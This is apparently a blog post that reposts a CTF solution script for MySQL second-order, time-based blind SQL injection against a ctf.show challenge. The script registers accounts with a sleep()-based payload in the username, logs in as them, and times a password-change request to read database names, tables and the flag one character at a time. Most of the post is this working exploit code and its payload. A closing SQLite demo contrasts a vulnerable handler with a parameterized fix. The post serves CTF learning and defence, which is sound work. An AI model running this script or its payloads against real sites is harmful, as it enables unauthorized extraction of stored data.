MySQL second-order (time-based) blind injection, Python script

Based on the principle of MySQL second-order injection, i.e. exploiting a stored injection: register first, then log in, then call the password-change function. The script automates the time-based blind injection decision for each character and dumps the data.

Borrowed from the script by the expert "孤桜懶契".

# -*- coding:UTF-8 -*-
# Author: 孤桜懶契
# Date: 2021/8/10
# blog: gylq.gitee.io

import requests
import time


flag = ""
#*************************************************************************************************************************************************************
#-------- list database names
#sql="select group_concat(schema_name) from information_schema.schemata"
#-------- list tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#-------- list columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
#-------- read the flag
sql= "select flag4 from ctfshow.flag"
#*************************************************************************************************************************************************************
# The injection is stored in the username at registration; the condition fires later,
# when the password-change handler reuses the stored username in a new query.
payload = "admin' and if(ascii(substr(({}),{},1))>'{}',sleep(0.4),0)#"
i = 0

session = requests.session()
for i in range(1,666):
    # binary search over printable ASCII (32..126) for the i-th character
    head = 32
    tail = 127

    while head < tail:
        mid = (head+tail) >> 1
        # step 1: register an account whose username carries the payload
        url_register = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/login_create.php"
        data = {
            'username' : payload.format(sql,i,mid),
            'password' : '22',
            're_password' : '22',
            'submit' : 'Register'
        }
        res = session.post(url=url_register,data=data)

        # step 2: log in as that account so the session is bound to the stored username
        url_login = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/login.php"
        data = {
            'login_user' : payload.format(sql,i,mid),
            'login_password' : '22',
            'mysubmit' : 'Login'
        }
        res = session.post(url=url_login, data=data)

        # step 3: change the password; this query reuses the stored username, so the
        # sleep() condition runs here and the response time reveals the comparison result
        url_change = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/pass_change.php"
        data = {
            'current_password' : '22',
            'password' : '1',
            're_password' : '1',
            'submit' : 'Reset'
        }
        start = time.time()
        res = session.post(url=url_change, data=data)
        end = time.time()
        print(end - start)
        # a delay in (0.4, 1) s means the condition "ascii > mid" was true
        if end-start > 0.4 and end-start < 1:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] Blind injection of character {} done'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        # no character above 32 matched: end of the value
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break
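To show why escaping at registration does not protect the later query, here is an added minimal second-order injection demo (written for this page, not the original author's script): a vulnerable password-change handler next to the parameterized fix, on an in-memory SQLite table. The table and column names are assumptions, not the challenge's, and SQLite has no sleep(), so the demo uses a plain trailing comment instead of the time-based condition.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge's user table
# (table and column names are assumptions, not the challenge's own).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'adminpass')")
    return conn

def register(conn, username, password):
    # Registration is parameterized: the payload is stored verbatim and
    # harmlessly. The flaw is not here.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def change_password_vulnerable(conn, username, new_password):
    # Second-order flaw: the username read back from the database is treated
    # as trusted and concatenated into a new query, so whatever was stored at
    # registration now runs as SQL (the script above abuses the same pattern
    # with sleep()-based conditions in MySQL).
    stored = conn.execute("SELECT username FROM users WHERE username = ?",
                          (username,)).fetchone()[0]
    conn.execute(f"UPDATE users SET password = '{new_password}' WHERE username = '{stored}'")

def change_password_fixed(conn, username, new_password):
    # Same flow, but the stored value is bound as a parameter on every query,
    # so it can never change the statement's structure.
    stored = conn.execute("SELECT username FROM users WHERE username = ?",
                          (username,)).fetchone()[0]
    conn.execute("UPDATE users SET password = ? WHERE username = ?", (new_password, stored))

def password_of(conn, username):
    return conn.execute("SELECT password FROM users WHERE username = ?",
                        (username,)).fetchone()[0]

def run(handler):
    """Register a username carrying a trailing SQL comment, change its password
    through `handler`, and return (admin_password, attacker_password)."""
    conn = make_db()
    attacker = "admin'--"   # constructed payload; SQLite uses -- for comments
    register(conn, attacker, "22")
    handler(conn, attacker, "1")
    return password_of(conn, "admin"), password_of(conn, attacker)

if __name__ == "__main__":
    print("vulnerable:", run(change_password_vulnerable))  # admin's row is overwritten
    print("fixed:     ", run(change_password_fixed))       # only the attacker's own row changes
```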

Posted on 2024-04-03 14:49 by 叶子在行动